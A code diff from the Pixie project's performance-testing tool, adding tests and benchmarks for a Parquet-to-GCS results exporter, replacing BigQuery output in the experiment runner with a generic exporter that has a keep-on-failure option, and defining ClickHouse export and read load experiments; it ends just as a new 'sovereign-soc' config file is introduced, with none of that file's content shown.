+ * + * SPDX-License-Identifier: Apache-2.0 + */ + +package exporter + +import ( + "context" + "errors" + "fmt" + "io" + "os" + "path/filepath" + "sort" + "strings" + "testing" + "time" + + "github.com/gofrs/uuid" + "github.com/parquet-go/parquet-go" + "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" + + "px.dev/pixie/src/e2e_test/perf_tool/pkg/metrics" +) + +func TestCollectTagKeys(t *testing.T) { + rows := []bufferedRow{ + {Tags: map[string]string{"pod": "pod-1", "node_name": "node-1"}}, + {Tags: map[string]string{"pod": "pod-2", "instance": "inst-1"}}, + {Tags: map[string]string{}}, + } + + keys := collectTagKeys(rows) + + assert.Equal(t, []string{"instance", "node_name", "pod"}, keys) +} + +func TestCollectTagKeys_Empty(t *testing.T) { + rows := []bufferedRow{ + {Tags: map[string]string{}}, + } + + keys := collectTagKeys(rows) + + assert.Empty(t, keys) +} + +func TestBuildResultSchema(t *testing.T) { + tagKeys := []string{"node_name", "pod"} + + schema := buildResultSchema(tagKeys) + + fields := schema.Fields() + fieldNames := make([]string, len(fields)) + for i, f := range fields { + fieldNames[i] = f.Name() + } + sort.Strings(fieldNames) + + assert.Equal(t, []string{ + "experiment_id", + "name", + "tag_node_name", + "tag_pod", + "timestamp", + "value", + }, fieldNames) +} + +func TestBuildResultRow_AllTagsPresent(t *testing.T) { + ts := time.Date(2026, 4, 15, 10, 30, 0, 0, time.UTC) + row := bufferedRow{ + ExperimentID: "test-id", + Timestamp: ts, + Name: "cpu_usage", + Value: 42.5, + Tags: map[string]string{"pod": "pod-1", "node_name": "node-1"}, + } + tagKeys := []string{"node_name", "pod"} + + parquetRow := buildResultRow(row, tagKeys) + + // Schema sorts fields alphabetically: + // experiment_id, name, tag_node_name, tag_pod, timestamp, value + assert.Equal(t, 6, len(parquetRow)) + + // Verify column indices are sequential. + for i, v := range parquetRow { + assert.Equal(t, i, v.Column(), "column index mismatch at position %d", i) + } +} + +func TestBuildResultRow_MissingTag(t *testing.T) { + ts := time.Date(2026, 4, 15, 10, 30, 0, 0, time.UTC) + row := bufferedRow{ + ExperimentID: "test-id", + Timestamp: ts, + Name: "rss", + Value: 1024.0, + Tags: map[string]string{"pod": "pod-1"}, + } + tagKeys := []string{"node_name", "pod"} + + parquetRow := buildResultRow(row, tagKeys) + + assert.Equal(t, 6, len(parquetRow)) + + // Find the tag_node_name column (should be null). + // Alphabetical order: experiment_id(0), name(1), tag_node_name(2), tag_pod(3), timestamp(4), value(5) + tagNodeNameVal := parquetRow[2] + assert.True(t, tagNodeNameVal.IsNull(), "missing tag should produce a null value") + assert.Equal(t, 0, tagNodeNameVal.DefinitionLevel(), "null optional field should have definitionLevel=0") + + // tag_pod should be present. + tagPodVal := parquetRow[3] + assert.False(t, tagPodVal.IsNull()) + assert.Equal(t, 1, tagPodVal.DefinitionLevel(), "present optional field should have definitionLevel=1") +} + +func TestFlushBatch_WritesValidParquet(t *testing.T) { + tmpDir := t.TempDir() + var uploadedPath string + + e := &ParquetGCSExporter{ + batchSize: 100, + upload: func(ctx context.Context, objectPath string, localPath string) error { + // Copy the parquet file to our temp dir before it gets cleaned up. 
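+			// flushBatch removes its temp file via `defer os.Remove`, so this hook is
+			// the only point at which the written bytes can be captured for assertions.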
+ dest := filepath.Join(tmpDir, filepath.Base(objectPath)) + src, err := os.Open(localPath) + if err != nil { + return err + } + defer src.Close() + dst, err := os.Create(dest) + if err != nil { + return err + } + defer dst.Close() + if _, err := io.Copy(dst, src); err != nil { + return err + } + uploadedPath = dest + return nil + }, + } + + ts := time.Date(2026, 4, 15, 12, 0, 0, 0, time.UTC) + rows := []bufferedRow{ + { + ExperimentID: "exp-1", + Timestamp: ts, + Name: "cpu_usage", + Value: 0.85, + Tags: map[string]string{"pod": "kelvin-abc", "node_name": "node-1"}, + }, + { + ExperimentID: "exp-1", + Timestamp: ts.Add(30 * time.Second), + Name: "rss", + Value: 1048576, + Tags: map[string]string{"pod": "kelvin-abc"}, + }, + } + + err := e.flushBatch(context.Background(), "test/path", 0, rows) + require.NoError(t, err) + require.NotEmpty(t, uploadedPath) + + // Read back the parquet file and verify contents. + f, err := os.Open(uploadedPath) + require.NoError(t, err) + defer f.Close() + + stat, err := f.Stat() + require.NoError(t, err) + + pf, err := parquet.OpenFile(f, stat.Size()) + require.NoError(t, err) + + schema := pf.Schema() + assert.Equal(t, int64(2), pf.NumRows()) + + // Verify schema has expected columns. + fields := schema.Fields() + fieldNames := make([]string, len(fields)) + for i, f := range fields { + fieldNames[i] = f.Name() + } + sort.Strings(fieldNames) + assert.Equal(t, []string{ + "experiment_id", + "name", + "tag_node_name", + "tag_pod", + "timestamp", + "value", + }, fieldNames) + + // Re-open the file for the reader (the File consumed the initial handle). + f2, err := os.Open(uploadedPath) + require.NoError(t, err) + defer f2.Close() + + reader := parquet.NewReader(f2) + defer reader.Close() + + parquetRows := make([]parquet.Row, 2) + n, err := reader.ReadRows(parquetRows) + // ReadRows returns io.EOF when it reaches the end, even if it read rows. + if err != nil && !errors.Is(err, io.EOF) { + require.NoError(t, err) + } + assert.Equal(t, 2, n) + + // First row should have all tags present. + // Second row should have tag_node_name as null. 
+ // Column order (alphabetical): experiment_id(0), name(1), tag_node_name(2), tag_pod(3), timestamp(4), value(5) + row0NodeName := parquetRows[0][2] + assert.False(t, row0NodeName.IsNull(), "first row tag_node_name should be present") + + row1NodeName := parquetRows[1][2] + assert.True(t, row1NodeName.IsNull(), "second row tag_node_name should be null") +} + +func TestExportResults_SingleBatch(t *testing.T) { + tmpDir := t.TempDir() + uploadedFiles := make(map[string]string) + + expID := uuid.Must(uuid.NewV4()) + e := &ParquetGCSExporter{ + prefix: "perf-results", + batchSize: 100, + upload: func(ctx context.Context, objectPath string, localPath string) error { + dest := filepath.Join(tmpDir, strings.ReplaceAll(objectPath, "/", "_")) + src, err := os.Open(localPath) + if err != nil { + return err + } + defer src.Close() + dst, err := os.Create(dest) + if err != nil { + return err + } + defer dst.Close() + if _, err := io.Copy(dst, src); err != nil { + return err + } + uploadedFiles[objectPath] = dest + return nil + }, + } + + resultCh := make(chan *metrics.ResultRow, 3) + ts := time.Date(2026, 4, 15, 14, 0, 0, 0, time.UTC) + resultCh <- &metrics.ResultRow{ + Timestamp: ts, + Name: "cpu_seconds_counter", + Value: 100.5, + Tags: map[string]string{"pod": "server-abc"}, + } + resultCh <- &metrics.ResultRow{ + Timestamp: ts.Add(30 * time.Second), + Name: "rss", + Value: 2097152, + Tags: map[string]string{"pod": "server-abc", "node_name": "node-0"}, + } + resultCh <- &metrics.ResultRow{ + Timestamp: ts.Add(60 * time.Second), + Name: "vsize", + Value: 4194304, + Tags: map[string]string{"pod": "server-abc", "node_name": "node-0"}, + } + close(resultCh) + + err := e.ExportResults(context.Background(), expID, resultCh) + require.NoError(t, err) + + // Should have produced exactly one batch file. + assert.Equal(t, 1, len(uploadedFiles), "expected exactly one parquet file") + + // Verify the GCS path includes the date and experiment ID. + for objectPath := range uploadedFiles { + assert.Contains(t, objectPath, expID.String()) + assert.Contains(t, objectPath, "perf-results/") + assert.Contains(t, objectPath, "results_0000.parquet") + } + + // Read the parquet file and verify row count. + for _, localPath := range uploadedFiles { + f, err := os.Open(localPath) + require.NoError(t, err) + defer f.Close() + + stat, err := f.Stat() + require.NoError(t, err) + + pf, err := parquet.OpenFile(f, stat.Size()) + require.NoError(t, err) + assert.Equal(t, int64(3), pf.NumRows()) + + // Verify schema has tag columns from the union of all rows. + fields := pf.Schema().Fields() + fieldNames := make([]string, len(fields)) + for i, f := range fields { + fieldNames[i] = f.Name() + } + sort.Strings(fieldNames) + assert.Equal(t, []string{ + "experiment_id", + "name", + "tag_node_name", + "tag_pod", + "timestamp", + "value", + }, fieldNames) + } +} + +func TestExportResults_MultipleBatches(t *testing.T) { + tmpDir := t.TempDir() + uploadedFiles := make(map[string]string) + + expID := uuid.Must(uuid.NewV4()) + e := &ParquetGCSExporter{ + batchSize: 2, // Small batch size to force multiple files. 
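+		// The upload hook below records every object path so the test can assert
+		// both the batch count and the results_NNNN.parquet naming.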
+ upload: func(ctx context.Context, objectPath string, localPath string) error { + dest := filepath.Join(tmpDir, strings.ReplaceAll(objectPath, "/", "_")) + src, err := os.Open(localPath) + if err != nil { + return err + } + defer src.Close() + dst, err := os.Create(dest) + if err != nil { + return err + } + defer dst.Close() + if _, err := io.Copy(dst, src); err != nil { + return err + } + uploadedFiles[objectPath] = dest + return nil + }, + } + + resultCh := make(chan *metrics.ResultRow, 5) + ts := time.Date(2026, 4, 15, 14, 0, 0, 0, time.UTC) + for i := 0; i < 5; i++ { + resultCh <- &metrics.ResultRow{ + Timestamp: ts.Add(time.Duration(i) * 30 * time.Second), + Name: "cpu_usage", + Value: float64(i) * 0.1, + Tags: map[string]string{"pod": "test-pod"}, + } + } + close(resultCh) + + err := e.ExportResults(context.Background(), expID, resultCh) + require.NoError(t, err) + + // 5 rows with batch size 2 should produce 3 files: [2, 2, 1]. + assert.Equal(t, 3, len(uploadedFiles), "expected 3 parquet files for 5 rows with batch size 2") + + // Verify file naming. + hasFile0, hasFile1, hasFile2 := false, false, false + for objectPath := range uploadedFiles { + if strings.Contains(objectPath, "results_0000.parquet") { + hasFile0 = true + } + if strings.Contains(objectPath, "results_0001.parquet") { + hasFile1 = true + } + if strings.Contains(objectPath, "results_0002.parquet") { + hasFile2 = true + } + } + assert.True(t, hasFile0, "missing results_0000.parquet") + assert.True(t, hasFile1, "missing results_0001.parquet") + assert.True(t, hasFile2, "missing results_0002.parquet") + + // Verify total row count across all files. + totalRows := int64(0) + for _, localPath := range uploadedFiles { + f, err := os.Open(localPath) + require.NoError(t, err) + defer f.Close() + stat, err := f.Stat() + require.NoError(t, err) + pf, err := parquet.OpenFile(f, stat.Size()) + require.NoError(t, err) + totalRows += pf.NumRows() + } + assert.Equal(t, int64(5), totalRows) +} + +func TestExportResults_EmptyChannel(t *testing.T) { + uploadCalled := false + e := &ParquetGCSExporter{ + batchSize: 100, + upload: func(ctx context.Context, objectPath string, localPath string) error { + uploadCalled = true + return nil + }, + } + + resultCh := make(chan *metrics.ResultRow) + close(resultCh) + + expID := uuid.Must(uuid.NewV4()) + err := e.ExportResults(context.Background(), expID, resultCh) + require.NoError(t, err) + assert.False(t, uploadCalled, "no files should be uploaded for empty channel") +} + +// --- Benchmarks --- + +// makeBenchRows generates n buffered rows with the specified number of tag keys. 
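+// Tag values differ per row ("value_<row>_<key>") so the benchmarks exercise
+// realistic, non-deduplicated strings rather than a single repeated value.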
+func makeBenchRows(n int, numTags int) []bufferedRow { + ts := time.Date(2026, 4, 15, 12, 0, 0, 0, time.UTC) + rows := make([]bufferedRow, n) + for i := range rows { + tags := make(map[string]string, numTags) + for j := 0; j < numTags; j++ { + tags[fmt.Sprintf("tag_key_%d", j)] = fmt.Sprintf("value_%d_%d", i, j) + } + rows[i] = bufferedRow{ + ExperimentID: "bench-exp-id", + Timestamp: ts.Add(time.Duration(i) * 30 * time.Second), + Name: "cpu_usage", + Value: float64(i) * 0.01, + Tags: tags, + } + } + return rows +} + +func BenchmarkBuildResultRow(b *testing.B) { + for _, numTags := range []int{2, 5, 10} { + b.Run(fmt.Sprintf("tags=%d", numTags), func(b *testing.B) { + rows := makeBenchRows(1, numTags) + tagKeys := collectTagKeys(rows) + row := rows[0] + b.ResetTimer() + b.ReportAllocs() + for i := 0; i < b.N; i++ { + buildResultRow(row, tagKeys) + } + }) + } +} + +func BenchmarkCollectTagKeys(b *testing.B) { + for _, numRows := range []int{100, 1000, 10000} { + b.Run(fmt.Sprintf("rows=%d", numRows), func(b *testing.B) { + rows := makeBenchRows(numRows, 3) + b.ResetTimer() + b.ReportAllocs() + for i := 0; i < b.N; i++ { + collectTagKeys(rows) + } + }) + } +} + +func BenchmarkFlushBatch(b *testing.B) { + for _, numRows := range []int{100, 1000, 10000} { + b.Run(fmt.Sprintf("rows=%d", numRows), func(b *testing.B) { + rows := makeBenchRows(numRows, 3) + e := &ParquetGCSExporter{ + batchSize: numRows, + upload: func(ctx context.Context, objectPath string, localPath string) error { + // No-op upload: measures only in-memory conversion + parquet write to disk. + return nil + }, + } + b.ResetTimer() + b.ReportAllocs() + for i := 0; i < b.N; i++ { + if err := e.flushBatch(context.Background(), "bench/path", 0, rows); err != nil { + b.Fatal(err) + } + } + }) + } +} diff --git a/src/e2e_test/perf_tool/pkg/metrics/prometheus_recorder.go b/src/e2e_test/perf_tool/pkg/metrics/prometheus_recorder.go index 19d08b1b0a9..8e5c1768e24 100644 --- a/src/e2e_test/perf_tool/pkg/metrics/prometheus_recorder.go +++ b/src/e2e_test/perf_tool/pkg/metrics/prometheus_recorder.go @@ -43,10 +43,11 @@ import ( ) type prometheusRecorderImpl struct { - clusterCtx *cluster.Context - spec *experimentpb.PrometheusScrapeSpec - eg *errgroup.Group - resultCh chan<- *ResultRow + clusterCtx *cluster.Context + ownsClusterCtx bool + spec *experimentpb.PrometheusScrapeSpec + eg *errgroup.Group + resultCh chan<- *ResultRow wg sync.WaitGroup stopCh chan struct{} @@ -79,6 +80,9 @@ func (r *prometheusRecorderImpl) Close() { for _, fw := range r.fws { fw.Close() } + if r.ownsClusterCtx { + r.clusterCtx.Close() + } } func (r *prometheusRecorderImpl) run() error { diff --git a/src/e2e_test/perf_tool/pkg/metrics/recorder.go b/src/e2e_test/perf_tool/pkg/metrics/recorder.go index 7e7e44e06e2..12bdf8fd502 100644 --- a/src/e2e_test/perf_tool/pkg/metrics/recorder.go +++ b/src/e2e_test/perf_tool/pkg/metrics/recorder.go @@ -20,6 +20,7 @@ package metrics import ( "context" + "fmt" "golang.org/x/sync/errgroup" @@ -35,7 +36,7 @@ type Recorder interface { } // NewMetricsRecorder creates a new Recorder for the given MetricSpec. 
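+// It now returns an error as well: building a prometheus recorder may have to
+// construct a dedicated cluster context from kubeconfig_path/kube_context,
+// which can fail.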
-func NewMetricsRecorder(pxCtx *pixie.Context, clusterCtx *cluster.Context, spec *experimentpb.MetricSpec, eg *errgroup.Group, resultCh chan<- *ResultRow) Recorder { +func NewMetricsRecorder(pxCtx *pixie.Context, clusterCtx *cluster.Context, spec *experimentpb.MetricSpec, eg *errgroup.Group, resultCh chan<- *ResultRow) (Recorder, error) { switch spec.MetricType.(type) { case *experimentpb.MetricSpec_PxL: return &pxlScriptRecorderImpl{ @@ -44,14 +45,26 @@ func NewMetricsRecorder(pxCtx *pixie.Context, clusterCtx *cluster.Context, spec eg: eg, resultCh: resultCh, - } + }, nil case *experimentpb.MetricSpec_Prom: - return &prometheusRecorderImpl{ - clusterCtx: clusterCtx, - spec: spec.GetProm(), - eg: eg, - resultCh: resultCh, + promSpec := spec.GetProm() + recorderCtx := clusterCtx + ownsCtx := false + if promSpec.KubeconfigPath != "" || promSpec.KubeContext != "" { + var err error + recorderCtx, err = cluster.NewContextFromOptions(promSpec.KubeconfigPath, promSpec.KubeContext) + if err != nil { + return nil, fmt.Errorf("failed to create cluster context for prometheus recorder: %w", err) + } + ownsCtx = true } + return &prometheusRecorderImpl{ + clusterCtx: recorderCtx, + ownsClusterCtx: ownsCtx, + spec: promSpec, + eg: eg, + resultCh: resultCh, + }, nil } - return nil + return nil, nil } diff --git a/src/e2e_test/perf_tool/pkg/run/BUILD.bazel b/src/e2e_test/perf_tool/pkg/run/BUILD.bazel index 55b3fdc18a9..524a3cab626 100644 --- a/src/e2e_test/perf_tool/pkg/run/BUILD.bazel +++ b/src/e2e_test/perf_tool/pkg/run/BUILD.bazel @@ -18,19 +18,16 @@ load("@io_bazel_rules_go//go:def.bzl", "go_library") go_library( name = "run", - srcs = [ - "row.go", - "run.go", - ], + srcs = ["run.go"], importpath = "px.dev/pixie/src/e2e_test/perf_tool/pkg/run", visibility = ["//visibility:public"], deps = [ "//src/e2e_test/perf_tool/experimentpb:experiment_pl_go_proto", "//src/e2e_test/perf_tool/pkg/cluster", "//src/e2e_test/perf_tool/pkg/deploy", + "//src/e2e_test/perf_tool/pkg/exporter", "//src/e2e_test/perf_tool/pkg/metrics", "//src/e2e_test/perf_tool/pkg/pixie", - "//src/shared/bq", "@com_github_cenkalti_backoff_v4//:backoff", "@com_github_gofrs_uuid//:uuid", "@com_github_gogo_protobuf//jsonpb", diff --git a/src/e2e_test/perf_tool/pkg/run/run.go b/src/e2e_test/perf_tool/pkg/run/run.go index b02b15219c2..2a5af23d06e 100644 --- a/src/e2e_test/perf_tool/pkg/run/run.go +++ b/src/e2e_test/perf_tool/pkg/run/run.go @@ -39,18 +39,22 @@ import ( "px.dev/pixie/src/e2e_test/perf_tool/experimentpb" "px.dev/pixie/src/e2e_test/perf_tool/pkg/cluster" "px.dev/pixie/src/e2e_test/perf_tool/pkg/deploy" + "px.dev/pixie/src/e2e_test/perf_tool/pkg/exporter" "px.dev/pixie/src/e2e_test/perf_tool/pkg/metrics" "px.dev/pixie/src/e2e_test/perf_tool/pkg/pixie" - "px.dev/pixie/src/shared/bq" ) // Runner is responsible for running experiments using the ClusterProvider to get a cluster for the experiment. type Runner struct { c cluster.Provider pxCtx *pixie.Context - resultTable *bq.Table - specTable *bq.Table + exporter exporter.Exporter containerRegistryRepo string + skaffoldStderrFile string + // KeepOnFailure, when true, skips teardown (stop vizier/workloads/recorders + // and cluster cleanup) if the experiment errors, so the cluster state can + // be inspected after the fact. Successful runs still tear down normally. + keepOnFailure bool clusterCtx *cluster.Context clusterCleanup func() @@ -66,16 +70,24 @@ type Runner struct { } // NewRunner creates a new Runner for the given contexts. 
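+// The exporter determines where results land (BigQuery via BQExporter, or
+// Parquet files on GCS via ParquetGCSExporter).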
-func NewRunner(c cluster.Provider, pxCtx *pixie.Context, resultTable *bq.Table, specTable *bq.Table, containerRegistryRepo string) *Runner { +// skaffoldStderrFile, when non-empty, is the path to which skaffold's stderr is appended +// during deploy steps. Pass "" to keep skaffold's stderr going only to the perf_tool +// process's stderr. +func NewRunner(c cluster.Provider, pxCtx *pixie.Context, exp exporter.Exporter, containerRegistryRepo, skaffoldStderrFile string) *Runner { return &Runner{ c: c, pxCtx: pxCtx, - resultTable: resultTable, - specTable: specTable, + exporter: exp, containerRegistryRepo: containerRegistryRepo, + skaffoldStderrFile: skaffoldStderrFile, } } +// SetKeepOnFailure toggles whether teardown is skipped on experiment failure. +func (r *Runner) SetKeepOnFailure(v bool) { + r.keepOnFailure = v +} + // RunExperiment runs an experiment according to the given ExperimentSpec. func (r *Runner) RunExperiment(ctx context.Context, expID uuid.UUID, spec *experimentpb.ExperimentSpec) error { commitTopoOrder, err := getTopoOrder() @@ -83,14 +95,12 @@ func (r *Runner) RunExperiment(ctx context.Context, expID uuid.UUID, spec *exper return err } - eg := errgroup.Group{} - eg.Go(func() error { return r.getCluster(ctx, spec.ClusterSpec) }) - eg.Go(func() error { - if err := r.prepareWorkloads(ctx, spec); err != nil { - return backoff.Permanent(err) - } - return nil - }) + if err := r.getCluster(ctx, spec.ClusterSpec); err != nil { + return err + } + if err := r.prepareWorkloads(ctx, spec); err != nil { + return err + } r.metricsBySelector = make(map[string][]metrics.Recorder) r.metricsResultCh = make(chan *metrics.ResultRow) @@ -98,19 +108,23 @@ func (r *Runner) RunExperiment(ctx context.Context, expID uuid.UUID, spec *exper defer metricsChCloseOnce.Do(func() { close(r.metricsResultCh) }) r.wg.Add(1) - go r.runBQInserter(expID) - - if err := eg.Wait(); err != nil { - if r.clusterCleanup != nil { - r.clusterCleanup() + go func() { + defer r.wg.Done() + if err := r.exporter.ExportResults(ctx, expID, r.metricsResultCh); err != nil { + log.WithError(err).Error("Failed to export results") } - if r.clusterCtx != nil { - r.clusterCtx.Close() + }() + + var runErr error + defer func() { + if r.keepOnFailure && runErr != nil { + log.WithError(runErr).Warn("Experiment failed; --keep_on_failure is set, leaving cluster state intact. " + + "Inspect with kubectl; you are responsible for manual cleanup (e.g. `px delete`, delete workload namespaces).") + return } - return err - } - defer r.clusterCleanup() - defer r.clusterCtx.Close() + r.clusterCleanup() + r.clusterCtx.Close() + }() var egCtx context.Context r.eg, egCtx = errgroup.WithContext(ctx) @@ -123,26 +137,16 @@ func (r *Runner) RunExperiment(ctx context.Context, expID uuid.UUID, spec *exper }) if err := r.eg.Wait(); err != nil { + runErr = err return err } - // The experiment succeeded so we write the spec to bigquery. + // The experiment succeeded so we write the spec to the exporter. 
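+	// Exporting the spec only on success means downstream consumers can treat
+	// the presence of a spec row/file as a completeness marker for the run.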
encodedSpec, err := (&jsonpb.Marshaler{}).MarshalToString(spec) if err != nil { return err } - specRow := &SpecRow{ - ExperimentID: expID.String(), - Spec: encodedSpec, - CommitTopoOrder: commitTopoOrder, - } - - inserter := r.specTable.Inserter() - inserter.SkipInvalidRows = false - - putCtx, cancel := context.WithTimeout(ctx, 5*time.Minute) - defer cancel() - if err := inserter.Put(putCtx, specRow); err != nil { + if err := r.exporter.ExportSpec(ctx, expID, encodedSpec, commitTopoOrder); err != nil { return err } @@ -152,8 +156,21 @@ func (r *Runner) RunExperiment(ctx context.Context, expID uuid.UUID, spec *exper return nil } -func (r *Runner) runActions(ctx context.Context, spec *experimentpb.ExperimentSpec) error { +func (r *Runner) runActions(ctx context.Context, spec *experimentpb.ExperimentSpec) (retErr error) { canceledErr := backoff.Permanent(context.Canceled) + // Collect start-action cleanups explicitly so we can skip them when + // --keep_on_failure is set and the experiment errors. + var cleanups []func() + defer func() { + failed := retErr != nil || ctx.Err() != nil + if r.keepOnFailure && failed { + log.Warn("Skipping per-action teardown due to --keep_on_failure") + return + } + for i := len(cleanups) - 1; i >= 0; i-- { + cleanups[i]() + } + }() for _, a := range spec.RunSpec.Actions { log.Tracef("started action %s", experimentpb.ActionType_name[int32(a.Type)]) if canceled := r.sendActionTimestamp(ctx, a, "begin"); canceled { @@ -165,19 +182,19 @@ func (r *Runner) runActions(ctx context.Context, spec *experimentpb.ExperimentSp if err != nil { return err } - defer cleanup() + cleanups = append(cleanups, cleanup) case experimentpb.START_WORKLOADS: cleanup, err := r.startWorkloads(ctx, spec, a.Name) if err != nil { return err } - defer cleanup() + cleanups = append(cleanups, cleanup) case experimentpb.START_METRIC_RECORDERS: cleanup, err := r.startMetricRecorders(ctx, spec, a.Name) if err != nil { return err } - defer cleanup() + cleanups = append(cleanups, cleanup) case experimentpb.STOP_VIZIER: if err := r.stopVizier(); err != nil { return err @@ -233,7 +250,11 @@ func (r *Runner) startMetricRecorders(ctx context.Context, spec *experimentpb.Ex continue } - recorder := metrics.NewMetricsRecorder(r.pxCtx, r.clusterCtx, ms, r.eg, r.metricsResultCh) + recorder, err := metrics.NewMetricsRecorder(r.pxCtx, r.clusterCtx, ms, r.eg, r.metricsResultCh) + if err != nil { + _ = r.stopMetricRecorders(selector) + return noCleanup, fmt.Errorf("failed to create metrics recorder: %w", err) + } r.metricsBySelector[selector] = append(r.metricsBySelector[selector], recorder) if err := recorder.Start(ctx); err != nil { _ = r.stopMetricRecorders(selector) @@ -344,7 +365,7 @@ func (r *Runner) getCluster(ctx context.Context, spec *experimentpb.ClusterSpec) } func (r *Runner) prepareWorkloads(ctx context.Context, spec *experimentpb.ExperimentSpec) error { - vizier, err := deploy.NewWorkload(r.pxCtx, r.containerRegistryRepo, spec.VizierSpec) + vizier, err := deploy.NewWorkload(r.pxCtx, r.containerRegistryRepo, r.skaffoldStderrFile, spec.VizierSpec) if err != nil { return err } @@ -355,7 +376,7 @@ func (r *Runner) prepareWorkloads(ctx context.Context, spec *experimentpb.Experi } r.workloadsBySelector = make(map[string][]deploy.Workload) for _, s := range spec.WorkloadSpecs { - w, err := deploy.NewWorkload(r.pxCtx, r.containerRegistryRepo, s) + w, err := deploy.NewWorkload(r.pxCtx, r.containerRegistryRepo, r.skaffoldStderrFile, s) if err != nil { return err } @@ -368,29 +389,6 @@ func (r *Runner) 
prepareWorkloads(ctx context.Context, spec *experimentpb.Experi return nil } -func (r *Runner) runBQInserter(expID uuid.UUID) { - defer r.wg.Done() - - bqCh := make(chan interface{}) - defer close(bqCh) - - inserter := &bq.BatchInserter{ - Table: r.resultTable, - BatchSize: 512, - PushTimeout: 2 * time.Minute, - } - go inserter.Run(bqCh) - - for row := range r.metricsResultCh { - bqRow, err := MetricsRowToResultRow(expID, row) - if err != nil { - log.WithError(err).Error("Failed to convert result row") - continue - } - bqCh <- bqRow - } -} - func getTopoOrder() (int, error) { cmd := exec.Command("git", "rev-list", "--count", "HEAD") var stdout bytes.Buffer diff --git a/src/e2e_test/perf_tool/pkg/suites/BUILD.bazel b/src/e2e_test/perf_tool/pkg/suites/BUILD.bazel index 57b8a9fe368..5853d236094 100644 --- a/src/e2e_test/perf_tool/pkg/suites/BUILD.bazel +++ b/src/e2e_test/perf_tool/pkg/suites/BUILD.bazel @@ -22,11 +22,16 @@ go_library( "clusters.go", "experiments.go", "metrics.go", + "sovereign_soc.go", "suites.go", "workloads.go", ], embedsrcs = [ + "scripts/clickhouse_export.pxl", + "scripts/clickhouse_read.pxl", + "scripts/forensic_alerts.pxl", "scripts/healthcheck/http_data_in_namespace.pxl", + "scripts/healthcheck/redis_data_in_namespace.pxl", "scripts/healthcheck/vizier.pxl", "scripts/heap_size.pxl", "scripts/http_data_loss.pxl", diff --git a/src/e2e_test/perf_tool/pkg/suites/experiments.go b/src/e2e_test/perf_tool/pkg/suites/experiments.go index 998b31c7197..ceaf7408e2b 100644 --- a/src/e2e_test/perf_tool/pkg/suites/experiments.go +++ b/src/e2e_test/perf_tool/pkg/suites/experiments.go @@ -36,7 +36,7 @@ func HTTPLoadTestExperiment( dur time.Duration, ) *experimentpb.ExperimentSpec { e := &experimentpb.ExperimentSpec{ - VizierSpec: VizierWorkload(), + VizierSpec: VizierReleaseWorkload(), WorkloadSpecs: []*experimentpb.WorkloadSpec{ HTTPLoadTestWorkload(numConnections, targetRPS, true), }, @@ -347,6 +347,132 @@ func HTTPLoadApplicationOverheadExperiment( return e } +// ClickHouseExportExperiment drives load against Pixie's ClickHouse export +// path. An HTTP loadtest populates http_events on the PEMs, and the +// clickhouse_export PxL script runs on a tight period to continuously export +// a windowed slice of http_events to ClickHouse. +func ClickHouseExportExperiment( + numConnections int, + targetRPS int, + metricPeriod time.Duration, + exportPeriod time.Duration, + exportWindow time.Duration, + clickhouseDSN string, + clickhouseTable string, + predeployDur time.Duration, + dur time.Duration, +) *experimentpb.ExperimentSpec { + e := &experimentpb.ExperimentSpec{ + VizierSpec: VizierWorkload(), + WorkloadSpecs: []*experimentpb.WorkloadSpec{ + HTTPLoadTestWorkload(numConnections, targetRPS, true), + }, + MetricSpecs: []*experimentpb.MetricSpec{ + ProcessStatsMetrics(metricPeriod), + // Stagger the second query a little bit because of query stability issues. 
+ HeapMetrics(metricPeriod + (2 * time.Second)), + ClickHouseExportLoadMetric(exportPeriod, clickhouseDSN, clickhouseTable, clickhouseTable, exportWindow), + ClickHouseOperatorMetrics(metricPeriod), + }, + RunSpec: &experimentpb.RunSpec{ + Actions: []*experimentpb.ActionSpec{ + { + Type: experimentpb.START_VIZIER, + }, + { + Type: experimentpb.START_METRIC_RECORDERS, + }, + { + Type: experimentpb.BURNIN, + Duration: types.DurationProto(predeployDur), + }, + { + Type: experimentpb.START_WORKLOADS, + }, + { + Type: experimentpb.RUN, + Duration: types.DurationProto(dur), + }, + { + Type: experimentpb.STOP_METRIC_RECORDERS, + }, + }, + }, + ClusterSpec: DefaultCluster, + } + e = addTags(e, + "workload/clickhouse-export", + fmt.Sprintf("parameter/num_conns/%d", numConnections), + fmt.Sprintf("parameter/target_rps/%d", targetRPS), + fmt.Sprintf("parameter/export_window/%s", exportWindow), + ) + return e +} + +// ClickHouseReadExperiment drives load against Pixie's ClickHouse read path. +// HTTP loadtest populates http_events; a (placeholder) read-load workload +// drives sustained pressure against ClickHouse; the clickhouse_read PxL +// script periodically queries the ClickHouse source from Pixie so we can +// observe Pixie-side read performance as well. +func ClickHouseReadExperiment( + numConnections int, + targetRPS int, + metricPeriod time.Duration, + readPeriod time.Duration, + readWindow time.Duration, + clickhouseDSN string, + clickhouseTable string, + predeployDur time.Duration, + dur time.Duration, +) *experimentpb.ExperimentSpec { + e := &experimentpb.ExperimentSpec{ + VizierSpec: VizierWorkload(), + WorkloadSpecs: []*experimentpb.WorkloadSpec{ + HTTPLoadTestWorkload(numConnections, targetRPS, true), + ClickHouseReadLoadWorkload(), + }, + MetricSpecs: []*experimentpb.MetricSpec{ + ProcessStatsMetrics(metricPeriod), + // Stagger the second query a little bit because of query stability issues. + HeapMetrics(metricPeriod + (2 * time.Second)), + ClickHouseReadLoadMetric(readPeriod, clickhouseDSN, clickhouseTable, readWindow), + ClickHouseOperatorMetrics(metricPeriod), + }, + RunSpec: &experimentpb.RunSpec{ + Actions: []*experimentpb.ActionSpec{ + { + Type: experimentpb.START_VIZIER, + }, + { + Type: experimentpb.START_METRIC_RECORDERS, + }, + { + Type: experimentpb.BURNIN, + Duration: types.DurationProto(predeployDur), + }, + { + Type: experimentpb.START_WORKLOADS, + }, + { + Type: experimentpb.RUN, + Duration: types.DurationProto(dur), + }, + { + Type: experimentpb.STOP_METRIC_RECORDERS, + }, + }, + }, + ClusterSpec: DefaultCluster, + } + e = addTags(e, + "workload/clickhouse-read", + fmt.Sprintf("parameter/num_conns/%d", numConnections), + fmt.Sprintf("parameter/target_rps/%d", targetRPS), + fmt.Sprintf("parameter/read_window/%s", readWindow), + ) + return e +} + func addTags(e *experimentpb.ExperimentSpec, tags ...string) *experimentpb.ExperimentSpec { if e.Tags == nil { e.Tags = []string{} diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/bob-suite-attack-cm.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/bob-suite-attack-cm.yaml new file mode 100644 index 00000000000..03a10f0dab8 --- 